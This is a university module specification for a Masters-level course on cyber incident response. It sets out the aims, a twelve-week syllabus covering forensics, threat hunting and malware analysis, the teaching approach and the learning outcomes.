CC7007 - Cyber Incident Response (2024/25)
| Module specification | Module approved to run in 2024/25 | ||||||||||||
| Module title | Cyber Incident Response | ||||||||||||
| Module level | Masters (07) | ||||||||||||
| Credit rating for module | 20 | ||||||||||||
| School | School of Computing and Digital Media | ||||||||||||
| Total study hours | 200 | ||||||||||||
|
|||||||||||||
| Assessment components |
|
||||||||||||
| Running in 2024/25(Please note that module timeslots are subject to change) |
|
Module summary
This module seeks to provide students with a theoretical and practical systematic understanding of the cyber incident response and handling practice covering a wide range of scenarios. Incident response and threat-hunting activities are the keys to identifying and observing cyber incidents and malware indicators and patterns of activity to generate accurate threat intelligence that can be used to detect current and future intrusions. Students will be provided with the knowledge and comprehensive understanding of incident response tactics and procedures. The module covers all aspects of cyber incident response starting with prevention, immediate response, mitigation and post-incident investigation to determine the root cause of security breaches. This module addresses the growing demand for cybersecurity consultants and SOC analysts to monitor and maintain the security of public organisations and corporations. With a strong focus on virtualised environments that will allow students to act professionally within incident response and in malware/threat analysis. This module aims to achieve the following learning aims:
1. To provide students with knowledge and skills to establish how and when a cyber attack happened and identify compromised and infected systems.
2. To instruct students in the tools and techniques that will allow them to identify and extract evidence from IT devices and cloud storage.
3. To advance students’ skills to hunt down, identify, counter, and recover from a wide range of threats within enterprise networks, including APT nation-state adversaries, organized crime syndicates, and ransomware operators.
4. To Contain and remediate incidents and hunt down additional breaches using knowledge of the adversary.
Syllabus
Week 1: Incident Response and Handling Basics
Week 2: Advanced Incident Response & Threat Hunting
Week 3: Cyber Intrusion Investigation
Week 4: Live Memory Forensics 1
Week 5: Live Memory Forensics 2
Week 6: Cyber Incident Timeline Analysis
Week 7: Network Traffic Analysis
Week 8: Malware analysis (Code Analysis, Host/Network Analysis, Reverse Engineering, Mobile/x86 architecture, Machine Code Analysis, Vulnerability Analysis and Sandboxed Analysis)
Week 9: Advanced malware analysis (Encoding methods, Static/Dynamic Analysis, Disassembly, Obfuscation, Behaviour Analysis, Encoding methods).
Week 10: Incident Response & Hunting Across the Enterprise
Week 11: Advanced Adversary and anti-forensics detection
Week 12: Exam (In-Course Test)
Balance of independent study and scheduled teaching activity
Students will develop theoretical understanding and practical investigative skills based on weekly lectures, tutorials and supervised workshops. The workshops, in particular, are provided to support students in gaining practical experience in digital forensic investigations.
Appropriate blended learning approaches and technologies, such as the University’s VLE and industry-strength digital forensic tools, will be used to facilitate and support student learning, in particular, to:
• deliver content;
• encourage active learning;
• provide formative and summative assessments and prompt feedback;
• enhance student engagement and learning experience.
Students will be expected and encouraged to produce reflective commentaries on the learning activities and tasks that they carry out to complete their work.
Learning outcomes
By the end of this module students should be able to achieve:
LO1. Advanced knowledge and practical skills in cyber incident response and handling including security/digital forensic principles and methods related to incident response and malware analysis.
LO2. Deep and critical understanding of the theory and practice of computer, mobile, IoT and Cloud forensics.
LO3. Learn and master the tools, techniques, and procedures necessary to effectively hunt, detect, and contain a variety of adversaries and to remediate incidents.
LO4. Use memory analysis, incident response, and threat-hunting tools to detect hidden processes, malware, attacker command lines, rootkits, and network connections, and hunt through and perform incident response across systems.
LO5. Recover data cleared using anti-forensics techniques and use collected data to perform effective remediation.